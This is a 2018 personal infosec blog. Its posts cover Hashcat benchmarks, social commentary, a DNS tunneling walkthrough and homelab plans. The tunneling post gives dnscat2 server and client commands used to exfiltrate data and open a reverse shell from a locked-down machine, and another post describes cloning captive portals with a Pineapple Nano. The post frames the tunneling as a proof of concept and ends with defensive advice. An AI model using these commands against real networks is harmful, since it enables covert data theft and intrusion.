Friday, March 30, 2018

Hashcat GPU benchmarks

Tired of incessant Googling for the same benchmarks, I compiled a spreadsheet of benchmarks (various versions of Hashcat) for Nvidia's GTX 9xx and 10xx series of GPUs.

Note that Hashcat versions 3.20 and later are generally much better than previous versions. Some of the benchmarks I found for older cards were for those older versions, and the results might be higher with newer versions of Hashcat.


Tuesday, March 27, 2018

Random thoughts

I've somewhat soured with time on Twitter as a platform for thoughts/tweets. This Twitter thread is a good example of how not to provide interesting information in article form:

  • Unnecessary background of Twitter user's profile
  • Lede with bigger font
  • Distracting retweets and likes after each 240-character text block
  • Way too much extra stuff for each comment (actual comment text highlighted).


 If you want to have photographs along with itty bitty blurbs of your subject, then use an appropriate format: e.g. EnglishRussia or LiveJournal travelogues.


*******************************

The whole discussion about UBI is useful, but (without any sources) I wonder why the argument "people will have more time to focus on their passions" is frequently trotted out. I think it's fair to say that most people aren't terribly self-propelled and might just vegetate all day in front of the TV or play computer games forever. Of course new jobs might be developed to help manage the hosts of issues that crop up when you sit all day, but is that something we will have to acknowledge when it happens.


******************************

The Facebook thing going on brings to mind again how easy it is to exploit the vast quantity of information to be evil, so much that I'm surprised it doesn't happen more frequently. Perhaps it's because Opsec is hard, or because the thinking is easy but implementation is harder. So many people don't use ad blockers, or go through life with low IQ or lack of critical thinking skills to identify when they are being duped, or give apps any permissions necessary. Non-compliance with the law is not an issue if you don't get caught, and aside from getting prosecuted on an individual scale, lawsuits against companies take so long that you can continue predatory practices so long as a ruling hasn't happened.

Once you dispel the notion that a product has to follow all the rules of government regulations, ethics, normal human politeness, etc, then it's very easy to decide to exploit human weaknesses for your own purposes, whether it be marketing, advertisement, or whatever (see social engineering and OSINT). 

“If you know the personality of the people you’re you’re
targeting, you can nuance your messaging to resonate
more effectively with those key audience groups”
Alexander Nix, Cambridge
Analytica"
So strictly speaking CA did nothing wrong. Who knew that it would take the election of the wrong person for the media to notice it? CA is the logical conclusion of the ability to weaponize ubiquitous ad networks, coupled with Facebook's targeted advertising, and probably a bit of de-anonymizing as well.

***********************************

With all the reading I'm doing thanks to the plane's holding pattern, I'm getting lots of new thoughts. Currently musing while reading this interesting presentation from Defcon 25 (August 2017) about weaponizing ads and propaganda. If politics / targeted advertising / Facebook / all that is so bad, wrecks your ability to do math (see here, page 14, Discussion section), then why not disengage? You'll only wind up smarter than everyone who engages, and possibly more employable in the near future when the unholy combination of gig economies, loss of welfare programs, wealth inequality, long squeeze of climate change, and pending automation via neural networks, all combine to make a lot of people become unemployable.

Wednesday, March 21, 2018

DNS Tunneling walk-through

DNS is a rather complicated system to resolve IP addresses into human readable words and vice versa. There's any number of guides online for understanding and implementing DNS, but the average user will only see it in the following form:


The reason DNS is actually quite complicated can be figured out from the Wikipedia article linked above, or by looking at the steps involved above. That's a lot of hops and different potential computers to query just to get to google.com. In fact, before step 3 above there can be another step if your computer is in a complicated network, such as at a corporate office location, where a local DNS server is queried first before going out onto the web:


Please read the following presentation I found, especially on slide 11 which illustrates the arrows in the image above.

It helped me to think of DNS as parts of a system rather than a whole, e.g. it's a "decentralized naming system for computers, services, or other resources connected to the Internet or a private network". To help make the Internet work, various "authoritative" servers have some version of this naming system installed, and respond to DNS "queries" to translate websites names to IP addresses for your web browser to understand. Since it's just a naming system, there's any number of DNS programs, and even your own computer can function as part of this, such as being a local DNS server.

Here's a query we can go over from my home network, which isn't a perfect environment as a recent network/router upgrade plus use of a secondary DNS server has created hard to figure out DNS issues. We're going to use the "nslookup" tool to resolve "www.yosefkerzner.com".



Now, because I like to get to the deep levels of who things work, let's start from the top, or bottom as it were.

1. The computer issuing the request has received a local IP of 192.168.3.107 from the router via DHCP. DHCP is a way of handing out IP addresses dynamically.


 Along with this IP, the router told the computer to use 192.168.3.102 as the local DNS server. This IP address, with a hostname of pihole, hosts just that, the Pi-Hole network ad blocker. Along with interesting ad-blocking effects, websites can load faster thanks to some extra caching. So the nslookup tool first outputs just that information.

Then a DNS query is issued to the Pi-Hole:





Next, the pihole refers to the "upstream" DNS settings in its configuration, and finds that the upstream DNS settings have the Google DNS servers of 8.8.8.8 and 8.8.4.4. For some reason two DNS queries for the A record are made (this is strange and I don't know why it happens):



While looking for the A resource record, the Google DNS server discovers a CNAME resource record saying that "www.yosefkerzner.com" is an alias for "yosefkerzner.com", so it re-initiates the query using "yosefkerzner.com".  It finds an A record for "yosefkerzner.com" with the matching IP address of 75.98.175.85, and returns that information to the pihole.

This then gets passed back to the original computer:




I'm not getting into existing NS records for this domain and what role they play in the resolving process, and also not discussing resolving 75.98.175.85 (reverse-dns), as this currently isn't working for a reason I'll have to investigate, but probably has to do with the domain being hosted on A2Hosting, not a standalone server.

Now, after this sidetracking, we can get back to the main topic. If you've read some of the links, you'll see that there's a whole number of resource records that can be configured for DNS, including a TXT record, which permits you to add arbitrary information about a domain. This can be useful in situations where regular browsing over HTTP isn't working, whether because you have to pay Delta a ton of money to browse their inflight-wifi, or pay a hotel to use the wifi, or because a pesky network administrator has blocked all outbound HTTP communication and isn't monitoring DNS. Why not use the TXT records to hold other types of data and make a data tunnel with DNS?

Enter DNS tunneling. Guides are available everywhere, here's the best image I've found:


Me and some colleagues used DNS tunneling to prove it was possible to send data from a locked-down Windows 10 machine meant for a secure environment outbound to a server under my control. I followed this guide: https://zeltser.com/c2-dns-tunneling/ mostly, but used a rewrite of the DnsCat2 tool created by the folks at BlackHillsInfosec for Powershell, dnscat2-powershell, as the original client executable was flagged by antivirus and immediately removed.

The domain I used was "yosefkerzner.com", and in A2Hosting the settings were set as follows:
  1. Visit https://my.a2hosting.com/clientarea.php?action=domaindetails
  2. Click the entry that says "Private Nameservers". Register a NameServer Name. In my case it was dns1.yosefkerzner.com. Enter the IP address of the droplet created during the guide above, and click "Save Changes". Create another one for dns2.
  3. Now, click the section titled "Nameservers". Click "Use Custom Nameservers" and enter your private nameservers, e.g. dns1.yosefkerzner.com and dns2.yosefkerzner.com.
  4. Click "Change Nameservers" and wait 24-48 hours as the nameserver information gets propagated across the web. Watch whatever content hosted originally on your domain disappear.

 I encountered the following issues with Dnscat2:
  • The tunnel created was highly unstable.
    • It did not tolerate being idle, as eventually DNS queries would get jumbled up and the tunnel would break, so eventually I simply launched long queries such as a dump of running processes to keep the tunnel alive while researching what else could be exfiltrated.
    • I was forced to launch a connection first, and only then to drop into a reverse shell. Command shells didn't work at all, though console connections did if I wanted to type text in the client and see it on the server.
    • Security tunnel options included in the tool also caused instability, so I had to operate it without security or secret passphrases, e.g.:
      • On the server: ruby ./dnscat2.rb --security=open --no-cache --dns="domain=yosefkerzner.com"
      • On the client: Start-Dnscat2 -Domain yosefkerzner.com -NoEncryption
  • Uploading and Downloading didn't work at all, even for small files.

All in all it was a fun experience and great proof of concept of the importance of security controls for DNS. To prevent DNS tunneling consider limiting outbound DNS or using DNSSEC, and monitoring for large DNS volumes, because no client needs to be sending vast quantities of DNS queries to a unknown IP address.

Tuesday, March 20, 2018

Reading fun stuff

Thanks to a fortunate stroke of luck, I'm in another city in a holding pattern, waiting on a client to give me (us) work to do. In the meantime there's stuff to read and news inputs to improve, e.g. TweetDeck - now it's all pretty and Twitter is usable for information again.

https://arxiv.org/pdf/1803.03453v1.pdf - my favorite video from this paper is the following: Evolving Soft Robots with Multiple Materials

Was also sent this article about Getting up to Speed with Ethereum, and indeed it's quite the crash course. Currently I'm bogged down in Ethereum DNS equivalent proposal and envisioning alternate browsers. Oh wait there already is one, kinda, called Mist

After the Ethereum crash course I plan to read through the resources on this Technet article about Active Directory and only then start creating an Active Directory lab.

With all this spare time, I'm also making improvements to music downloading scripts and other random stuff. For instance, yesterday afternoon was spent in a frustrating attempt to get the Pineapple Nano "Portal Auth" and "Captive Portal" modules to work, but no matter what I do, cloning websites just doesn't work. The nano's native ASH shell doesn't help either. I'll keep at it but at some point it will be easier to just host my own web server, with a copy of the login portal, then host the portal somehow and overpower nearby broadcast APs with my signal.

In other news, I'd installed a new Graylog VM to take Nzyme inputs on a system with more resources. It worked fine for a few days while connected to the homelab, but apparently on VPN it can't take the same input... which makes sense given that it's got the NAT'ed address. What's worse, even on NAT the web interface fails to load completely all while the CPU usage is completely maxed. So that's another thing to hunt down, because I'd like to gather 10-20 GB worth of data to mess with yet some other time.

Friday, March 16, 2018

Projects Update

I think I'll start posting these sorts of updates regularly, not least as a way of keeping track for myself (brain dump hehe).

Ever since Italy, and even before that, I've been in a bit of a funk, still interested in infosec but wishing for something else. This probably isn't related to work, but for now it might be due to stagnation of new ideas/areas. Maybe it would make sense to study at coffee places (can't say coffeeshop after Amsterdam) in more social environments.

Anyway, here's a list of pending projects:

  • Still need to setup Active Directory
  • Still need to setup the wireless lab environment for the Defcon Enterprise Wifi hacking lab
  • Still need to set up the raspberry pi to stream ragas
  • Streamline password-cracking process using a new GTX 970 combined with WakeOnLan
    • This will include hashcat wordlists plus rules
  • Read all the books, and especially Network+ for more ideas
  • Sit down and think of the best form factor for an always-on VM machine. As much as the current machine (which is a trash save, having previously been one of my dad's PCs) works, it's still 9 years old, dual core, max 8 GB DR2 non-ECC ram, with a 160 GB spinny and as I discovered yesterday simply can't handle newer operating systems such as an always-available Kali Linux system. Intel NUCs look nice, though I'd like the lowest decibel operating noise level possible. Maybe I'll upgrade the current box instead.
  • Try implementing an SSO solution for the homelab. With just a few certificates for VPN I can already foresee certificate management being a nightmare, let alone implementing SSH certificates everywhere. 
  • Try implementing a vulnerability management program. For some reason, identical versions of Raspbian can have different outdated versions of Apache even when fully upgraded - so how are these prioritized?
  • Try again to get ICMP ping to work within the LAN.
  • Track down pesky Plex issues. 

I'll post more items later.